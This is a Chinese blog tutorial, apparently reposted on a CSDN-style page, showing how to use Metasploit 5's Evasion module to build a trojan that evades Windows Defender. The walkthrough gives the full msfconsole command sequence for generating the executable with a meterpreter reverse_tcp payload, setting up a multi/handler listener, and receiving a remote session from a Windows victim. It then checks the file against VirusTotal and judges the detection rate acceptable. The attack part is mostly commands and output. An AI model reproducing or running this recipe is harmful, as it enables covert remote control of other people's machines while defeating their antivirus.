使用metasploit中Evasion模块

最新推荐文章于 2023-05-25 17:09:01 发布
最新推荐文章于 2023-05-25 17:09:01 发布
阅读量489 收藏
点赞数
文章标签: 网络
原文链接:https://yq.aliyun.com/articles/693553
版权

简介

几天前我说了kali这次更新我最关心的是metasploit升级到了5.0,5.0中有一个新的模块叫Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试

操作

首先打开metasploit

msfconsole

你会看到下面这个界面

  ~ msfconsole
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.



      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,
           :kk;.OOOOOOOOOOOOO.;Ok:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v5.0.2-dev-c808cbe0509d4e8819879c6e1ed8bda45c34a19f]
+ -- --=[ 1851 exploits - 1046 auxiliary - 321 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ]

之后使用evasion模块,首先看看有什么evasion模块

msf5 > show evasion

evasion
=======

   Name                             Disclosure Date  Rank    Check  Description
   ----                             ---------------  ----    -----  -----------
   windows/windows_defender_exe                      normal  No     Microsoft Windows Defender Evasive Executable
   windows/windows_defender_js_hta                   normal  No     Microsoft Windows Defender Evasive JS.Net and HTA

使用windows/windows_defender_exe这个模块

use windows/windows_defender_exe

查看要配置的参数

show options

msf5 evasion(windows/windows_defender_exe) > show options

Module options (evasion/windows/windows_defender_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  oDlIipoP.exe     yes       Filename for the evasive file (default: random)


Evasion target:

   Id  Name
   --  ----
   0   Microsoft Windows

就一个文件名参数可以配置

set FILENAME bboysoul.exe

之后使用reverse_tcp payload

set payload windows/meterpreter/reverse_tcp

设置端口和ip

set LHOST 10.10.10.186

set LPORT 4444

生成木马文件

exploit

之后打开一个监听端口

use multi/handler

设置payload

set payload windows/meterpreter/reverse_tcp

设置主机和端口

set LHOST 10.10.10.186

set LPORT 4444

执行

exploit

接着我们把生成出来的木马在远端要被控制的windows机器上运行我们这里就可以接收到这个回话了

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.10.186:4444

^@[*] Sending stage (179779 bytes) to 10.10.10.167
[*] Meterpreter session 1 opened (10.10.10.186:4444 -> 10.10.10.167:52882) at 2019-02-23 13:37:14 +0800

上面都是常规操作,之后我们扫描病毒

打开

www.virustotal.com

放入文件扫描

只有33个病毒引擎扫描出来了,说明还可以

欢迎关注Bboysoul的博客www.bboysoul.com

Have Fun

weixin_34390105
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
metasploit使用详解.pdf
08-14
metasploit使用详解.pdf
Mac下安装Metasploit记录
Make
07-31 1775
1、安装PostgreSQL 通过homebrew来安装,命令很简单 brew install postgresql To migrate existing data from a previous major version of PostgreSQL run: brew postgresql-upgrade-database To have launchd start postgr...
Android Bitmap优化
R.先森的博客
07-10 3146
概述 在日常开发我们经常遇到加载图片报出oom的错误,我们要解决这个问题,首先要明白oom代表out of memory 内存溢出,因为手机内存有限,分给每个应用的内存有限,所以要解决这个问题就是要解决图片占用内存问题 android 图片是以bitmap的形式存在的,那么bitmap所占的内存,直接影响到了是否oom,我们了解一下bitmap的占用内存的计算方法 图片的长度 * 图片...
metasploit介绍及使用
热门推荐
weixin_43873557的博客
02-07 2万+
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是全球最受欢迎的工具。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。 metasploit涵盖了渗透测试全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。 目录 kali-metasploit框架目录路径: /opt/metasploit-framework/embedded/framework/ /usr/share
Metasploit 文手册.pdf
06-27
Metasploit软件帮助安全专家和 IT 专家识别安全问题、验证漏洞修复情况,并管理由专家执行的安全评估。 该产品提供真正的安全风险智能,帮助用户保护...Metasploit 帮助团队进行协作,并在整合的报告显示其发现结果。
Metasploit 文 Wiki
05-05
Metasploit 文 Wiki Metasploit 文 Wiki Metasploit 文 Wiki
Mastering-Metasploit:掌握MetasploitMetasploit模块
05-17
此存储库包含《掌握Metasploit手册》涵盖的模块: #要将所有模块自动加载到metasploit: ./msfrun.sh #手动方法#加载所有核心metasploit模块(开发,辅助,发布): msf>加载路径/ root / Desktop / ...
metasploit使用指南
08-18
强大的metasploit 都懂得,入门上手的神器,指引你进入网络安全圣地
metasploit使用lnk漏洞渗透测试.doc
03-18
metasploit使用lnk漏洞渗透测试.doc
metasploit文操作手册
01-30
metasploit文操作手册 Metasploit® 软件帮助安全专家和IT 专家识别安全问题、验证漏洞修复情况,并管理由 专家执行的安全评估。...Metasploit 帮助团队进行协作,并在整合的报告显示其发现结果。
Metasploit使用教程
04-18
Metasploit使用教程,演示了一个完整的攻击实例
mad-metasploitMetasploit自定义模块,插件,资源脚本和很棒的metasploit集合
02-22
Metasploit自定义模块,插件,资源脚本和超棒的metasploit集合 惊人的 打开 将mad-metasploit添加到metasploit框架 ...使用自定义模块 搜索辅助/漏洞,其他.. HAHWUL > search springboot Matching Modules
metasploit使用手册.xmind
10-16
metasploit神器总结,介绍基本命令、模块、信息收集、后渗透攻击等。渗透攻击步骤。主机扫描。辅助模块端口扫描。查找可用端口模块。msf>search portscan。服务扫描、辅助模块
mysql pxc和mmm_MySQL高可用——PXC简介
weixin_42465846的博客
01-25 456
PXC简介:galera产品是以galera cluster方式为mysql提高高可用集群解决方案的。galera cluster就是集成了galera插件的mysql集群。galera replication是codership提供的mysql数据同步方案,具有高可用性,方便扩展,并且可以实现多个mysql节点间的数据同步复制与读写,可保障数据库的服务高可用及数据强一致性。PXC属于一套近乎完美...
Kali渗透测试:Metasploit 6.0 Evasion模块
Liu_Bruce的博客
05-11 769
Kali渗透测试:Metasploit 6.0 Evasion模块 Metasploit 开发团队一直致力于免杀技术的研究,并且将一些研究成果应用在了这款产品。其Evasion模块可以生成免杀的远程控制被控端。在启动Metasploit时,可以看到Evasion模块,启动命令如下: ┌──(root💀kali)-[~] └─# msfconsole 8个evasion模块,如下图所示: 使用show evasion命令可以列出Metasploit 6.0的所有Evasion模块 msf6 &g
Metasploit渗透框架
weixin_56378389的博客
05-25 393
MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试全过程,你可以在这个框架下利用现有的 Payload 进行一系列的渗透测试。模块是通过 Metasploit 框架装载集成对外提供的最核心的渗透测试功能实现代码。MSF所有的漏洞测试都是基于模块
Metasploit渗透测试框架基础
hanjinming110的博客
03-02 1998
MSF渗透测试框架基础
metasploit有哪些模块
最新发布
07-15
Metasploit是一款广泛使用的渗透测试...这只是Metasploit一些常见的模块类型,实际上还有很多其他类型和功能的模块可供使用Metasploit提供了强大的功能和灵活性,可以根据具体的渗透测试需求选择和使用适当的模块

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值